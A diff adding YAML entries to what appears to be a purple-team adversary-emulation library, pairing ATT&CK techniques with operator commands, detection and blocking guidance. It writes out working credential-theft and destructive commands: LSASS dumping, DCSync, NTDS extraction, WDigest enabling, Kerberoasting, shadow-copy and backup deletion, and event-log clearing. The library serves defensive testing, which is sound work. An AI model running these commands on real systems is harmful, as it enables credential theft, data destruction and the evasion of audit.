+    - https://github.com/GhostPack/SharpDPAPI
+    x_vectr_id: 95790889-fb7d-42af-a221-3535e4197cde
+    isv: 1
+- name: Volumetric Kerberoasting
+  description: Retrieve Kerberos TGS tickets from Active Directory for all users with service principal names (SPNs) set
+  platforms:
+  guidance:
+  - cmd> Rubeus.exe kerberoast
+  block:
+  - ''
+  detect:
+  - 'Configure Advanced Audit for Kerberos operations on domain controllers via Group Policy. Using ticket request logs (Event ID 4769), detect suspicious ticket request operations using one or more of the following strategies: 1) Look for a high volume of ticket requests or unique service principals in a short period of time as compared to the typical number of requests by that source. 2) Configure a honey account with a service principal name set then alert when any ticket is requested for that SPN (this requires first configuring a SACL on the account as well as directory service object access auditing via Advanced Audit). 3) Look for downgraded encryption requests where the requested ticket uses RC4 while the target object uses AES (Note: in cases where the account has a weak password, AES tickets can be cracked in a realistic timeframe so attacks may request AES tickets).'
+  controls:
+  - SIEM
+  - Identity Threat Protection
+  metadata:
+    id: c13ac2bf-6803-4525-9c5e-fda7b1b7fcb7
+    tid: T1558.003
+    tactic: TA0006
+    x_tools:
+    - https://github.com/GhostPack/Rubeus
+    x_vectr_id: c13ac2bf-6803-4525-9c5e-fda7b1b7fcb7
+    isv: 1
+- name: Extract NTDS credentials via ntdsutil.exe
+  description: Dump domain hashes for all domain users on the domain controller via ntdsutil.exe, which uses Volume Shadow Services (VSS)
+  platforms:
+  - windows
+  guidance:
+  - CMD> ntdsutil "ac in ntds" "ifm" "cr fu {{ outdirectory }}" q q
+  block:
+  - Suspicious process execution/behavior blocked by endpoint security tool
+  detect:
+  - Suspicious process execution/behavior detected by endpoint security tool
+  - Use shadow creation events (Event ID 822) and/or file system related Advanced Audit events (e.g. Event ID 4663) to identify Volume Shadow Service activities.
+  - Use process create events (e.g. Event ID 4688) to identify anomalous process invocation as compared to a baseline of process invocations by user and/or user characteristics (e.g. department). Base comparisons on the process/image name rather than the command line where possible.
+  - https://jpcertcc.github.io/ToolAnalysisResultSheet/details/ntdsutil.htm
+  controls:
+  - Endpoint Protection
+  - SIEM
+  metadata:
+    id: 08efdcab-54e0-4e06-8f72-b72f23e4fcab
+    tid: T1003.003
+    tactic: TA0006
+    x_vectr_id: 08efdcab-54e0-4e06-8f72-b72f23e4fcab
+    isv: 1
+- name: Enabled WDigest via Registry
+  description: Set the UseLogonCredential key in the WDigest hive to enable cleartext credential storage in-memory
+  platforms:
+  - windows
+  guidance:
+  - cmd> reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
+  block:
+  - Suspicious Registry modification blocked by endpoint security tool
+  detect:
+  - Enable object logging for the Registry via Group Policy Advanced Audit then configure a SACL on the Registry either directly or via the global audit settings in Group Policy. Trigger an alert when modification are made the Registry using object access logs (Event ID 4656).
+  controls:
+  - Endpoint Protection
+  - SIEM
+  metadata:
+    id: 9a66066b-997b-4ff1-8b4b-c14d982df861
+    tid: T1112
+    tactic: TA0005
+    x_vectr_id: 9a66066b-997b-4ff1-8b4b-c14d982df861
+    isv: 1
+- name: Register Security Service Provider (SSP) in LSASS
+  description: Register an SSP DLL that into LSASS. This technique can be used by adversaries to harvest credentials that traverse through LSASS.
+  platforms:
+  - windows
+  guidance:
+  - shell> {{ ssp_loader }}
+  block:
+  - Suspicious process execution/behavior blocked by endpoint security tool
+  - Enable the LSA "RunAsPPL" protection to prevent the loading of untrusted DLLs by LSASS
+  detect:
+  - For SSPs registered permanently, detect modifications to the "Security Packages" key under HKLM\System\CurrentControlSet\Control\LSA\. Additionally look for DLL writes to System32.
+  - For temporary SSP loads, detect anomalous module loads by LSASS.exe after establishing a basline for normal module loads
+  controls:
+  - Endpoint Protection
+  metadata:
+    id: 6efcb4c5-d740-41ce-a0dc-b63734813928
+    tid: T1547.005
+    tactic: TA0006
+    x_references:
+    - https://www.ired.team/offensive-security/credential-access-and-credential-dumping/intercepting-logon-credentials-via-custom-security-support-provider-and-authentication-package#loading-ssp-without-reboot
+    x_vectr_id: 6efcb4c5-d740-41ce-a0dc-b63734813928
+    isv: 1
+Impact:
+- name: Encrypt a large amount of files
+  description: Encrypt a large amount of files on the endpoint to simulate ransomware
+  platforms:
+  guidance:
+  - cmd> coldcryptor.exe run {{ extension }}
+  block:
+  - Suspicious process execution/behavior blocked by endpoint security tool
+  detect:
+  - Suspicious process execution/behavior detected by endpoint security tool
+  - Detect common ransomware extensions using file system telemetry
+  controls:
+  - Endpoint Protection
+  metadata:
+    id: 72224b97-93d1-4087-8b82-6b4342bf2e09
+    tid: T1486
+    tactic: TA0040
+    x_tools:
+    - https://github.com/2XXE-SRA/payload_resources/tree/master/coldencryptor
+    x_vectr_id: 72224b97-93d1-4087-8b82-6b4342bf2e09
+    isv: 1
+- name: Delete backup catalogs with wbadmin.exe
+  description: Delete native Windows backups
+  platforms:
+  - windows
+  guidance:
+  - CMD> wbadmin delete catalog -quiet
+  block:
+  - Suspicious process execution/behavior blocked by endpoint security tool
+  detect:
+  - Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+  - Use process create events (e.g. Event ID 4688) to identify anomalous process invocation as compared to a baseline of process invocations by user and/or user characteristics (e.g. department). Base comparisons on the process/image name rather than the command line where possible.
+  controls:
+  - SIEM
+  - Endpoint Protection
+  metadata:
+    id: 99c34e6d-c82a-48b8-88ea-7453f98ee561
+    tid: T1490
+    tactic: TA0040
+    x_vectr_id: 99c34e6d-c82a-48b8-88ea-7453f98ee561
+    isv: 1
+- name: Delete shadows with vssadmin.exe
+  description: Delete volume shadow copies on the host to inhibit file system recovery
+  platforms:
+  - windows
+  guidance:
+  - CMD> vssadmin.exe delete shadows /all /quiet
+  block:
+  - Suspicious process execution/behavior blocked by endpoint security tool
+  detect:
+  - Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+  - Suspicious Volume Shadow Service use detected in the SIEM using telemetry
+  controls:
+  - Endpoint Protection
+  - SIEM
+  metadata:
+    id: 31d4a02d-4a66-4740-a9c4-8814319fd5c4
+    tid: T1490
+    tactic: TA0040
+    x_vectr_id: 31d4a02d-4a66-4740-a9c4-8814319fd5c4
+    isv: 1
+- name: Modify group policy object
+  description: Modify a domain group policy object. This can be used for activities like persisting access to the environment, disabling security controls, and executing ransomware on domain systems.
+  platforms:
+  guidance:
+  block:
+  - ''
+  detect:
+  - Configure auditing on group policy objects then look for anomalous changes, such as those performed by unexpected principals or changes occuring outside of expected business processes
+  controls:
+  - SIEM
+  metadata:
+    id: 45591791-541b-4a27-bda9-75e6d78a66f4
+    tid: T1484.001
+    tactic: TA0005
+    x_vectr_id: 45591791-541b-4a27-bda9-75e6d78a66f4
+    isv: 1
+Exfiltration:
+- name: Extract data to cloud storage service
+  description: Extract data from the internal network to a cloud storage service like MEGA, Google Drive, or Box
+  platforms:
+  guidance:
+  block:
+  - Sensitive data sent over the network is blocked by network DLP tool
+  - Network security tool detects connection to domain based on category from proxy or DNS
+  detect:
+  - Sensitive data sent over the network is detected by network DLP tool
+  controls:
+  - Firewall
+  - DLP
+  - Web Gateway
+  metadata:
+    id: 9b1ad734-9b2b-4e12-8a7c-dacd2cddfb66
+    tid: T1567.002
+    tactic: TA0010
+    x_vectr_id: 9b1ad734-9b2b-4e12-8a7c-dacd2cddfb66
+    isv: 1
+- name: Extract sensitive data over HTTP
+  description: Extract data from the network over HTTP tcp/80 to an external host or IP.
+  platforms:
+  guidance:
+  - http://dlptest.com/http-post/
+  block:
+  - Sensitive data sent over the network is blocked by network DLP tool
+  detect:
+  - Sensitive data sent over the network is detected by network DLP tool
+  controls:
+  - Firewall
+  - DLP
+  - Web Gateway
+  metadata:
+    id: 7d63d9d1-0bb4-41b5-9fe2-785bad419860
+    tid: T1048.003
+    tactic: TA0010
+    x_vectr_id: 7d63d9d1-0bb4-41b5-9fe2-785bad419860
+    isv: 1
+- name: Extract sensitive data over HTTP C2
+  description: Extract data from the network via an HTTP C2 channel over tcp/80 to external host or IP
+  platforms:
+  guidance:
+  - implant> download {{ file }}
+  block:
+  - Sensitive data sent over the network is blocked by network DLP tool
+  - C2 channel is blocked by proxy, firewall, or network behavioral/UEBA tool
+  detect:
+  - C2 channel is detected by proxy, firewall, or network behavioral/UEBA tool
+  controls:
+  - Firewall
+  - DLP
+  - Web Gateway
+  metadata:
+    id: b48fa856-d004-4d5a-918f-d9429a9cd8e3
+    tid: T1041
+    tactic: TA0010
+    x_vectr_id: b48fa856-d004-4d5a-918f-d9429a9cd8e3
+    isv: 1
+Collection:
+- name: Screen Capture
+  description: Capture an image of the user's screen
+  platforms:
+  guidance:
+  - "implant> {{ screenshot_command }}\nOR \nshell> {{ screenshot_tool }}"
+  block:
+  - Suspicious process execution/behavior blocked by endpoint security tool
+  detect:
+  - Suspicious process execution/behavior detected by endpoint security tool
+  controls:
+  - Endpoint Protection
+  metadata:
+    id: 804512cc-4acf-4be3-a577-ce02ea723fab
+    tid: T1113
+    tactic: TA0009
+    x_tools:
+    - https://github.com/2XXE-SRA/payload_resources/blob/master/csharp/screenshot.cs
+    x_vectr_id: 804512cc-4acf-4be3-a577-ce02ea723fab
+    isv: 1
+- name: Keylogger
+  description: Log user keystrokes
+  platforms:
+  - windows
+  guidance:
+  - "implant> {{ keylog_command }}\nOR \nshell> {{ keylog_tool }}"
+  block:
+  - Suspicious process execution/behavior blocked by endpoint security tool
+  detect:
+  - Suspicious process execution/behavior detected by endpoint security tool
+  controls:
+  - Endpoint Protection
+  metadata:
+    id: be524cb1-12e6-4708-ad57-faf91dfad9de
+    tid: T1056.001
+    tactic: TA0009
+    x_tools:
+    - https://github.com/2XXE-SRA/payload_resources/blob/master/csharp/keylog.cs
+    x_vectr_id: be524cb1-12e6-4708-ad57-faf91dfad9de
+    isv: 1
+metadata:
+  prefix: OTI
+  bundle: Operational Technology Index 2024 v1.0
diff --git a/ot-index-2024/techniques/Collection/804512cc-4acf-4be3-a577-ce02ea723fab.yml b/ot-index-2024/techniques/Collection/804512cc-4acf-4be3-a577-ce02ea723fab.yml
new file mode 100644
index 0000000..d274f20
--- /dev/null
+++ b/ot-index-2024/techniques/Collection/804512cc-4acf-4be3-a577-ce02ea723fab.yml
@@ -0,0 +1,19 @@
+name: Screen Capture
+description: Capture an image of the user's screen
+platforms:
+guidance:
+- "implant> {{ screenshot_command }}\nOR \nshell> {{ screenshot_tool }}"
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool
+controls:
+- Endpoint Protection
+metadata:
+  id: 804512cc-4acf-4be3-a577-ce02ea723fab
+  tid: T1113
+  tactic: TA0009
+  x_tools:
+  - https://github.com/2XXE-SRA/payload_resources/blob/master/csharp/screenshot.cs
+  x_vectr_id: 804512cc-4acf-4be3-a577-ce02ea723fab
+  isv: 1
diff --git a/ot-index-2024/techniques/Collection/be524cb1-12e6-4708-ad57-faf91dfad9de.yml b/ot-index-2024/techniques/Collection/be524cb1-12e6-4708-ad57-faf91dfad9de.yml
new file mode 100644
index 0000000..62f850b
--- /dev/null
+++ b/ot-index-2024/techniques/Collection/be524cb1-12e6-4708-ad57-faf91dfad9de.yml
@@ -0,0 +1,20 @@
+name: Keylogger
+description: Log user keystrokes
+platforms:
+- windows
+guidance:
+- "implant> {{ keylog_command }}\nOR \nshell> {{ keylog_tool }}"
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool
+controls:
+- Endpoint Protection
+metadata:
+  id: be524cb1-12e6-4708-ad57-faf91dfad9de
+  tid: T1056.001
+  tactic: TA0009
+  x_tools:
+  - https://github.com/2XXE-SRA/payload_resources/blob/master/csharp/keylog.cs
+  x_vectr_id: be524cb1-12e6-4708-ad57-faf91dfad9de
+  isv: 1
diff --git a/ot-index-2024/techniques/CommandandControl/10f6c44e-b862-4553-bc55-68f6d941bcfb.yml b/ot-index-2024/techniques/CommandandControl/10f6c44e-b862-4553-bc55-68f6d941bcfb.yml
new file mode 100644
index 0000000..250d96d
--- /dev/null
+++ b/ot-index-2024/techniques/CommandandControl/10f6c44e-b862-4553-bc55-68f6d941bcfb.yml
@@ -0,0 +1,20 @@
+name: Access via remote assistance tool
+description: Establish connection to system using a legitimate remote assistance application
+platforms:
+guidance:
+block:
+- Block the installation and use of unapproved third-party utilities via application control software
+- Connections to known remote access service domains/IPs are blocked
+- Remote access connection attempts originating from users outside of the tenant are blocked
+detect:
+- Connections to known remote access service domains/IPs are detected
+controls:
+- Application Control
+- ID/PS
+- Firewall
+metadata:
+  id: 10f6c44e-b862-4553-bc55-68f6d941bcfb
+  tid: T1219
+  tactic: TA0011
+  x_vectr_id: 10f6c44e-b862-4553-bc55-68f6d941bcfb
+  isv: 1
diff --git a/ot-index-2024/techniques/CommandandControl/38064494-0d58-4f48-bce8-b5b7ea7db3da.yml b/ot-index-2024/techniques/CommandandControl/38064494-0d58-4f48-bce8-b5b7ea7db3da.yml
new file mode 100644
index 0000000..fa200fe
--- /dev/null
+++ b/ot-index-2024/techniques/CommandandControl/38064494-0d58-4f48-bce8-b5b7ea7db3da.yml
@@ -0,0 +1,18 @@
+name: HTTP C2 over tcp/80
+description: Establish a bidirectional command-and-control connection from a managed asset to an external server on the Internet over HTTP
+platforms:
+guidance:
+block:
+- C2 channel is blocked by proxy, firewall, or network behavioral/UEBA tool
+detect:
+- C2 channel is detected by proxy, firewall, or network behavioral/UEBA tool
+controls:
+- Firewall
+- ID/PS
+- Web Gateway
+metadata:
+  id: 38064494-0d58-4f48-bce8-b5b7ea7db3da
+  tid: T1071.001
+  tactic: TA0011
+  x_vectr_id: 38064494-0d58-4f48-bce8-b5b7ea7db3da
+  isv: 1
diff --git a/ot-index-2024/techniques/CommandandControl/3ed2f449-744b-48c3-80d2-854386e446a0.yml b/ot-index-2024/techniques/CommandandControl/3ed2f449-744b-48c3-80d2-854386e446a0.yml
new file mode 100644
index 0000000..075c765
--- /dev/null
+++ b/ot-index-2024/techniques/CommandandControl/3ed2f449-744b-48c3-80d2-854386e446a0.yml
@@ -0,0 +1,18 @@
+name: HTTPS C2 over tcp/443
+description: Establish a bidirectional command-and-control connection from a managed asset to an external server on the Internet over HTTPS
+platforms:
+guidance:
+block:
+- C2 channel is blocked by proxy, firewall, or network behavioral/UEBA tool
+detect:
+- C2 channel is detected by proxy, firewall, or network behavioral/UEBA tool
+controls:
+- Firewall
+- ID/PS
+- Web Gateway
+metadata:
+  id: 3ed2f449-744b-48c3-80d2-854386e446a0
+  tid: T1071.001
+  tactic: TA0011
+  x_vectr_id: 3ed2f449-744b-48c3-80d2-854386e446a0
+  isv: 1
diff --git a/ot-index-2024/techniques/CommandandControl/9755cd8b-5212-4331-8c6e-afb27404a4b9.yml b/ot-index-2024/techniques/CommandandControl/9755cd8b-5212-4331-8c6e-afb27404a4b9.yml
new file mode 100644
index 0000000..ac75a59
--- /dev/null
+++ b/ot-index-2024/techniques/CommandandControl/9755cd8b-5212-4331-8c6e-afb27404a4b9.yml
@@ -0,0 +1,18 @@
+name: Remote tool download over HTTP
+description: Download a tool from a public hosting location onto the victim system
+platforms:
+guidance:
+block:
+- Signatures for known-malicious tools/traffic are blocked by network security controls such as an ID/PS
+detect:
+- Signatures for known-malicious tools/traffic are detected by network security controls such as an ID/PS
+controls:
+- Firewall
+- ID/PS
+- Web Gateway
+metadata:
+  id: 9755cd8b-5212-4331-8c6e-afb27404a4b9
+  tid: T1105
+  tactic: TA0011
+  x_vectr_id: 9755cd8b-5212-4331-8c6e-afb27404a4b9
+  isv: 1
diff --git a/ot-index-2024/techniques/CredentialAccess/08efdcab-54e0-4e06-8f72-b72f23e4fcab.yml b/ot-index-2024/techniques/CredentialAccess/08efdcab-54e0-4e06-8f72-b72f23e4fcab.yml
new file mode 100644
index 0000000..83f653a
--- /dev/null
+++ b/ot-index-2024/techniques/CredentialAccess/08efdcab-54e0-4e06-8f72-b72f23e4fcab.yml
@@ -0,0 +1,22 @@
+name: Extract NTDS credentials via ntdsutil.exe
+description: Dump domain hashes for all domain users on the domain controller via ntdsutil.exe, which uses Volume Shadow Services (VSS)
+platforms:
+- windows
+guidance:
+- CMD> ntdsutil "ac in ntds" "ifm" "cr fu {{ outdirectory }}" q q
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool
+- Use shadow creation events (Event ID 822) and/or file system related Advanced Audit events (e.g. Event ID 4663) to identify Volume Shadow Service activities.
+- Use process create events (e.g. Event ID 4688) to identify anomalous process invocation as compared to a baseline of process invocations by user and/or user characteristics (e.g. department). Base comparisons on the process/image name rather than the command line where possible.
+- https://jpcertcc.github.io/ToolAnalysisResultSheet/details/ntdsutil.htm
+controls:
+- Endpoint Protection
+- SIEM
+metadata:
+  id: 08efdcab-54e0-4e06-8f72-b72f23e4fcab
+  tid: T1003.003
+  tactic: TA0006
+  x_vectr_id: 08efdcab-54e0-4e06-8f72-b72f23e4fcab
+  isv: 1
diff --git a/ot-index-2024/techniques/CredentialAccess/314b4f6a-b27a-4a55-af5c-c98bc3146dd8.yml b/ot-index-2024/techniques/CredentialAccess/314b4f6a-b27a-4a55-af5c-c98bc3146dd8.yml
new file mode 100644
index 0000000..12180d9
--- /dev/null
+++ b/ot-index-2024/techniques/CredentialAccess/314b4f6a-b27a-4a55-af5c-c98bc3146dd8.yml
@@ -0,0 +1,21 @@
+name: Dump LSASS memory using builtin comsvcs.dll
+description: Use rundll32.exe and comsvcs.dll to dump LSASS process memory to disk
+platforms:
+- windows
+guidance:
+- shell> rundll32.exe c:\windows\system32\comsvcs.dll MiniDump {{ lsass_pid }} {{ outpath }}  full
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+- Enable Credential Guard to prevent traditional process dumping of LSASS
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+controls:
+- SIEM
+- Endpoint Protection
+- Hardening
+metadata:
+  id: 314b4f6a-b27a-4a55-af5c-c98bc3146dd8
+  tid: T1003.001
+  tactic: TA0006
+  x_vectr_id: 314b4f6a-b27a-4a55-af5c-c98bc3146dd8
+  isv: 1
diff --git a/ot-index-2024/techniques/CredentialAccess/6efcb4c5-d740-41ce-a0dc-b63734813928.yml b/ot-index-2024/techniques/CredentialAccess/6efcb4c5-d740-41ce-a0dc-b63734813928.yml
new file mode 100644
index 0000000..a27e66e
--- /dev/null
+++ b/ot-index-2024/techniques/CredentialAccess/6efcb4c5-d740-41ce-a0dc-b63734813928.yml
@@ -0,0 +1,22 @@
+name: Register Security Service Provider (SSP) in LSASS
+description: Register an SSP DLL that into LSASS. This technique can be used by adversaries to harvest credentials that traverse through LSASS.
+platforms:
+- windows
+guidance:
+- shell> {{ ssp_loader }}
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+- Enable the LSA "RunAsPPL" protection to prevent the loading of untrusted DLLs by LSASS
+detect:
+- For SSPs registered permanently, detect modifications to the "Security Packages" key under HKLM\System\CurrentControlSet\Control\LSA\. Additionally look for DLL writes to System32.
+- For temporary SSP loads, detect anomalous module loads by LSASS.exe after establishing a basline for normal module loads
+controls:
+- Endpoint Protection
+metadata:
+  id: 6efcb4c5-d740-41ce-a0dc-b63734813928
+  tid: T1547.005
+  tactic: TA0006
+  x_references:
+  - https://www.ired.team/offensive-security/credential-access-and-credential-dumping/intercepting-logon-credentials-via-custom-security-support-provider-and-authentication-package#loading-ssp-without-reboot
+  x_vectr_id: 6efcb4c5-d740-41ce-a0dc-b63734813928
+  isv: 1
diff --git a/ot-index-2024/techniques/CredentialAccess/79640171-eeb3-44c2-9d9e-cf29c7f57af1.yml b/ot-index-2024/techniques/CredentialAccess/79640171-eeb3-44c2-9d9e-cf29c7f57af1.yml
new file mode 100644
index 0000000..821fcc8
--- /dev/null
+++ b/ot-index-2024/techniques/CredentialAccess/79640171-eeb3-44c2-9d9e-cf29c7f57af1.yml
@@ -0,0 +1,25 @@
+name: Dump LSASS memory using Sysinternals ProcDump
+description: Use ProcDump from Sysinternals to dump LSASS process memory
+platforms:
+- windows
+guidance:
+- CMD> procdump -ma lsass.exe dump
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+- Enable Credential Guard to prevent traditional process dumping of LSASS
+- Block the installation and use of unapproved third-party utilities via application control software
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+controls:
+- SIEM
+- Endpoint Protection
+- Hardening
+- Application Control
+metadata:
+  id: 79640171-eeb3-44c2-9d9e-cf29c7f57af1
+  tid: T1003.001
+  tactic: TA0006
+  x_tools:
+  - https://learn.microsoft.com/en-us/sysinternals/downloads/procdump
+  x_vectr_id: 79640171-eeb3-44c2-9d9e-cf29c7f57af1
+  isv: 1
diff --git a/ot-index-2024/techniques/CredentialAccess/8eeb3c12-dc2e-4791-aff5-e81501312886.yml b/ot-index-2024/techniques/CredentialAccess/8eeb3c12-dc2e-4791-aff5-e81501312886.yml
new file mode 100644
index 0000000..cd0d822
--- /dev/null
+++ b/ot-index-2024/techniques/CredentialAccess/8eeb3c12-dc2e-4791-aff5-e81501312886.yml
@@ -0,0 +1,20 @@
+name: Extract Logonpasswords via Nanodump
+description: Use nanodump to extract credentials from LSASS process memory
+platforms:
+- windows
+guidance:
+- cmd> nanodump.exe --duplicate -w {{ out_file }}
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+- Enable Credential Guard to prevent traditional process dumping of LSASS
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool
+controls:
+- Endpoint Protection
+- Hardening
+metadata:
+  id: 8eeb3c12-dc2e-4791-aff5-e81501312886
+  tid: T1003.001
+  tactic: TA0006
+  x_vectr_id: 8eeb3c12-dc2e-4791-aff5-e81501312886
+  isv: 1
diff --git a/ot-index-2024/techniques/CredentialAccess/95790889-fb7d-42af-a221-3535e4197cde.yml b/ot-index-2024/techniques/CredentialAccess/95790889-fb7d-42af-a221-3535e4197cde.yml
new file mode 100644
index 0000000..e5b69b7
--- /dev/null
+++ b/ot-index-2024/techniques/CredentialAccess/95790889-fb7d-42af-a221-3535e4197cde.yml
@@ -0,0 +1,22 @@
+name: Extract browser cookies
+description: Extract cookie information from the user's browser
+platforms:
+- windows
+guidance:
+- cmd> SharpChrome.exe cookies
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool
+- Suspicious access to database files used by browsers detected using file system telemetry in the SIEM
+controls:
+- Endpoint Protection
+- SIEM
+metadata:
+  id: 95790889-fb7d-42af-a221-3535e4197cde
+  tid: T1555.003
+  tactic: TA0006
+  x_tools:
+  - https://github.com/GhostPack/SharpDPAPI
+  x_vectr_id: 95790889-fb7d-42af-a221-3535e4197cde
+  isv: 1
diff --git a/ot-index-2024/techniques/CredentialAccess/9a66066b-997b-4ff1-8b4b-c14d982df861.yml b/ot-index-2024/techniques/CredentialAccess/9a66066b-997b-4ff1-8b4b-c14d982df861.yml
new file mode 100644
index 0000000..642834a
--- /dev/null
+++ b/ot-index-2024/techniques/CredentialAccess/9a66066b-997b-4ff1-8b4b-c14d982df861.yml
@@ -0,0 +1,19 @@
+name: Enabled WDigest via Registry
+description: Set the UseLogonCredential key in the WDigest hive to enable cleartext credential storage in-memory
+platforms:
+- windows
+guidance:
+- cmd> reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
+block:
+- Suspicious Registry modification blocked by endpoint security tool
+detect:
+- Enable object logging for the Registry via Group Policy Advanced Audit then configure a SACL on the Registry either directly or via the global audit settings in Group Policy. Trigger an alert when modification are made the Registry using object access logs (Event ID 4656).
+controls:
+- Endpoint Protection
+- SIEM
+metadata:
+  id: 9a66066b-997b-4ff1-8b4b-c14d982df861
+  tid: T1112
+  tactic: TA0005
+  x_vectr_id: 9a66066b-997b-4ff1-8b4b-c14d982df861
+  isv: 1
diff --git a/ot-index-2024/techniques/CredentialAccess/c13ac2bf-6803-4525-9c5e-fda7b1b7fcb7.yml b/ot-index-2024/techniques/CredentialAccess/c13ac2bf-6803-4525-9c5e-fda7b1b7fcb7.yml
new file mode 100644
index 0000000..ff73fb9
--- /dev/null
+++ b/ot-index-2024/techniques/CredentialAccess/c13ac2bf-6803-4525-9c5e-fda7b1b7fcb7.yml
@@ -0,0 +1,20 @@
+name: Volumetric Kerberoasting
+description: Retrieve Kerberos TGS tickets from Active Directory for all users with service principal names (SPNs) set
+platforms:
+guidance:
+- cmd> Rubeus.exe kerberoast
+block:
+- ''
+detect:
+- 'Configure Advanced Audit for Kerberos operations on domain controllers via Group Policy. Using ticket request logs (Event ID 4769), detect suspicious ticket request operations using one or more of the following strategies: 1) Look for a high volume of ticket requests or unique service principals in a short period of time as compared to the typical number of requests by that source. 2) Configure a honey account with a service principal name set then alert when any ticket is requested for that SPN (this requires first configuring a SACL on the account as well as directory service object access auditing via Advanced Audit). 3) Look for downgraded encryption requests where the requested ticket uses RC4 while the target object uses AES (Note: in cases where the account has a weak password, AES tickets can be cracked in a realistic timeframe so attacks may request AES tickets).'
+controls:
+- SIEM
+- Identity Threat Protection
+metadata:
+  id: c13ac2bf-6803-4525-9c5e-fda7b1b7fcb7
+  tid: T1558.003
+  tactic: TA0006
+  x_tools:
+  - https://github.com/GhostPack/Rubeus
+  x_vectr_id: c13ac2bf-6803-4525-9c5e-fda7b1b7fcb7
+  isv: 1
diff --git a/ot-index-2024/techniques/CredentialAccess/d6dd145b-c7ae-4f79-bc07-179a012a7a07.yml b/ot-index-2024/techniques/CredentialAccess/d6dd145b-c7ae-4f79-bc07-179a012a7a07.yml
new file mode 100644
index 0000000..76795bc
--- /dev/null
+++ b/ot-index-2024/techniques/CredentialAccess/d6dd145b-c7ae-4f79-bc07-179a012a7a07.yml
@@ -0,0 +1,20 @@
+name: Extract domain user credentials via replication
+description: Replicate a user's hash from a domain controller using replication APIs (DCSync).
+platforms:
+- windows
+guidance:
+- (from workstation) mimikatz> lsadump::dcsync /domain:{{ domain }} /user:{{ user }}
+block:
+- ''
+detect:
+- Enable object logging for directory services via Group Policy Advanced Audit then alert when non-domin controller sources replicate directory objects. Specifically, look for Event ID 4662 events where the action performed was related to replicating object changes (e.g. either/both of "Replicating Directory Changes all" and "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"/"{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}")
+- https://blog.blacklanternsecurity.com/p/detecting-dcsync
+controls:
+- SIEM
+- Identity Threat Protection
+metadata:
+  id: d6dd145b-c7ae-4f79-bc07-179a012a7a07
+  tid: T1003.006
+  tactic: TA0006
+  x_vectr_id: d6dd145b-c7ae-4f79-bc07-179a012a7a07
+  isv: 1
diff --git a/ot-index-2024/techniques/DefenseEvasion/16ed92a3-b979-464b-bc79-fadb43e3c6a1.yml b/ot-index-2024/techniques/DefenseEvasion/16ed92a3-b979-464b-bc79-fadb43e3c6a1.yml
new file mode 100644
index 0000000..8950dd0
--- /dev/null
+++ b/ot-index-2024/techniques/DefenseEvasion/16ed92a3-b979-464b-bc79-fadb43e3c6a1.yml
@@ -0,0 +1,22 @@
+name: Clear Windows Event Log entries
+description: Clear the Windows Event Log entries using the builtin wevtutil.exe to remove any attack indicators in the logs.
+platforms:
+- windows
+guidance:
+- CMD> wevtutil clear-log Security
+- CMD> wevtutil clear-log Application
+- CMD> wevtutil clear-log System
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+- Suspicious Windows Event Log deletion is detected in the SIEM using Event Log events (Event ID 1102)
+controls:
+- Endpoint Protection
+- SIEM
+metadata:
+  id: 16ed92a3-b979-464b-bc79-fadb43e3c6a1
+  tid: T1070.001
+  tactic: TA0005
+  x_vectr_id: 16ed92a3-b979-464b-bc79-fadb43e3c6a1
+  isv: 1
diff --git a/ot-index-2024/techniques/DefenseEvasion/2496e250-5757-482f-9661-daea872395ae.yml b/ot-index-2024/techniques/DefenseEvasion/2496e250-5757-482f-9661-daea872395ae.yml
new file mode 100644
index 0000000..1194713
--- /dev/null
+++ b/ot-index-2024/techniques/DefenseEvasion/2496e250-5757-482f-9661-daea872395ae.yml
@@ -0,0 +1,20 @@
+name: Sideload a DLL into a legitimate application
+description: Rename an attacker-controlled DLL to the name of a DLL expected by a legitimate application, move that DLL to be adjacent to the application, then execute the application in order to trigger the loading of the DLL by the legitimate application.
+platforms:
+- windows
+guidance:
+- "CMD>\ncopy {{ application }} .\nmove {{ dll }} {{ expected_dll }}\n{{ application }}"
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool
+- Using image load telemetry, alert on DLLs stored on-disk at unexpected locations (e.g. a DLL expected to be in System32 being loaded from a temp folder)
+controls:
+- Endpoint Protection
+- SIEM
+metadata:
+  id: 2496e250-5757-482f-9661-daea872395ae
+  tid: T1574.002
+  tactic: TA0005
+  x_vectr_id: 2496e250-5757-482f-9661-daea872395ae
+  isv: 1
diff --git a/ot-index-2024/techniques/DefenseEvasion/327db68c-178b-4e3c-8f2d-12d91bc49fe0.yml b/ot-index-2024/techniques/DefenseEvasion/327db68c-178b-4e3c-8f2d-12d91bc49fe0.yml
new file mode 100644
index 0000000..bc14660
--- /dev/null
+++ b/ot-index-2024/techniques/DefenseEvasion/327db68c-178b-4e3c-8f2d-12d91bc49fe0.yml
@@ -0,0 +1,22 @@
+name: Load known-abusable kernel driver
